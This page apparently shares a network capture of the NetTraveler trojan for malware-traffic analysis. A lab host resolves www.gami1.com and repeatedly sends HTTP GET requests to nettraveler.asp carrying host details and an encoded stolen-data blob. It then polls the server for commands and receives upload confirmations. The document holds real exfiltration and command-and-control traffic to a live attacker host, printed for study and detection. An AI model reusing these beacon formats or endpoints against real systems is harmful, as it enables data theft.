Nettraveler Net Traveler Data Personal Information Hijacking Malware Trojan PCAP Traffic Sample

By | January 29, 2016

Download raw PCAP of Nettraveler: nettravler.pcap

2013-01-05 22:43:42.583158 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31)
E..;.c……………5.5.’`U………….www.gami1.com…..
2013-01-05 22:43:43.577967 IP 172.16.253.130.53 > 8.8.8.8.53: 11908+ A? www.gami1.com. (31)
E..;.e……………5.5.’VI………….www.gami1.com…..
2013-01-05 22:43:43.578188 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31)
E..;.f……………5.5.’`U………….www.gami1.com…..
2013-01-05 22:43:44.085958 IP 4.2.2.2.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47)
E..Kt4……………5.5.7……………www.gami1.com……………..n”.
2013-01-05 22:43:44.085985 IP 4.2.2.2.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47)
E..Kt5……………5.5.7……………www.gami1.com……………..n”.

2013-01-05 22:43:44.176309 IP 172.16.253.130.1091 > 110.34.193.13.80: Flags [.], ack 1, win 64240, length 0
E..(.i@…!…..n”…C.P. …..)P…J…
2013-01-05 22:43:44.176508 IP 172.16.253.130.1091 > 110.34.193.13.80: Flags [P.], seq 1:1447, ack 1, win 64240, length 1446: HTTP: GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
E….j@………n”…C.P. …..)P…….GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive
2013-01-05 22:43:44.176669 IP 110.34.193.13.80 > 172.16.253.130.1091: Flags [.], ack 1447, win 64240, length 0
E..(t7……n”…….P.C…). ..P…E………
2013-01-05 22:43:44.274393 IP 110.34.193.13.80 > 172.16.253.130.1091: Flags [P.], seq 1:266, ack 1447, win 64240, length 265: HTTP: HTTP/1.1 200 OK
E..1t8……n”…….P.C…). ..P…….HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP; path=/
Cache-control: private

Fail!

2013-01-05 22:43:44.452111 IP 172.16.253.130.1092 > 110.34.193.13.80: Flags [.], ack 1, win 64240, length 0
E..(.n@…!…..n”…D.P-…i.9 P…6…
2013-01-05 22:43:44.452336 IP 172.16.253.130.1092 > 110.34.193.13.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460: HTTP: GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
E….o@………n”…D.P-…i.9 P… …GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive
Cookie: ASPSESSI
2013-01-05 22:43:44.452387 IP 172.16.253.130.1092 > 110.34.193.13.80: Flags [P.], seq 1461:1502, ack 1, win 64240, length 41: HTTP
E..Q.p@…!t….n”…D.P-…i.9 P…….ONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:43:44.452441 IP 110.34.193.13.80 > 172.16.253.130.1092: Flags [.], ack 1461, win 64240, length 0
E..(t<……n”…….P.Di.9 -…P…1………
2013-01-05 22:43:44.452563 IP 110.34.193.13.80 > 172.16.253.130.1092: Flags [.], ack 1502, win 64240, length 0
E..(t=……n”…….P.Di.9 -…P…0………
2013-01-05 22:43:44.635313 IP 110.34.193.13.80 > 172.16.253.130.1092: Flags [FP.], seq 1:199, ack 1502, win 64240, length 198: HTTP: HTTP/1.1 200 OK
E…t>……n”…….P.Di.9 -…P…`…HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5
Content-Type: text/html
Cache-control: private

2013-01-05 22:43:44.748940 IP 172.16.253.130.1093 > 110.34.193.13.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460: HTTP: GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
E….u@………n”…E.P..D9.Mk`P…8_..GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive
Cookie: ASPSESSI
2013-01-05 22:43:44.748998 IP 172.16.253.130.1093 > 110.34.193.13.80: Flags [P.], seq 1461:1502, ack 1, win 64240, length 41: HTTP
E..Q.v@…!n….n”…E.P..I..Mk`P…….ONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:43:44.749099 IP 110.34.193.13.80 > 172.16.253.130.1093: Flags [.], ack 1461, win 64240, length 0
E..(tA……n”…….P.E.Mk`..I.P…If……..
2013-01-05 22:43:44.749140 IP 110.34.193.13.80 > 172.16.253.130.1093: Flags [.], ack 1502, win 64240, length 0
E..(tB……n”…….P.E.Mk`..J.P…I=……..
2013-01-05 22:43:44.838945 IP 8.8.8.8.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47)
E..KtC……………5.5.7……………www.gami1.com……………..n”.
2013-01-05 22:43:44.941942 IP 110.34.193.13.80 > 172.16.253.130.1093: Flags [P.], seq 1:199, ack 1502, win 64240, length 198: HTTP: HTTP/1.1 200 OK
E…tD……n”…….P.E.Mk`..J.P…x…HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5
Content-Type: text/html
Cache-control: private

2013-01-05 22:43:45.483080 IP 172.16.253.130.1096 > 110.34.193.13.80: Flags [P.], seq 1:391, ack 1, win 64240, length 390: HTTP: GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
E…..@… …..n”…H.P…..Q.[P…….GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:43:45.483187 IP 110.34.193.13.80 > 172.16.253.130.1096: Flags [.], ack 391, win 64240, length 0
E..(tQ……n”…….P.H.Q.[..0MP…2………
2013-01-05 22:43:45.575340 IP 110.34.193.13.80 > 172.16.253.130.1096: Flags [P.], seq 1:274, ack 391, win 64240, length 273: HTTP: HTTP/1.1 200 OK
E..9tR……n”…….P.H.Q.[..0MP…Z”..HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Cache-control: private

24C6EC2F_Success:UPLOAD
6000ED23_Success:UPLOAD
28B8253B_Success:UPLOAD

2013-01-05 22:48:47.869138 IP 172.16.253.130.1106 > 110.34.193.13.80: Flags [P.], seq 1:391, ack 1, win 64240, length 390: HTTP: GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
E…..@………n”…R.Pn.3.;Je.P…X…GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:48:47.869254 IP 110.34.193.13.80 > 172.16.253.130.1106: Flags [.], ack 391, win 64240, length 0
E..(t…….n”…….P.R;Je.n.5jP………….
2013-01-05 22:48:47.964803 IP 110.34.193.13.80 > 172.16.253.130.1106: Flags [FP.], seq 1:274, ack 391, win 64240, length 273: HTTP: HTTP/1.1 200 OK
E..9t……yn”…….P.R;Je.n.5jP…….HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:34:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Cache-control: private

24C6EC2F_Success:UPLOAD
6000ED23_Success:UPLOAD
28B8253B_Success:UPLOAD
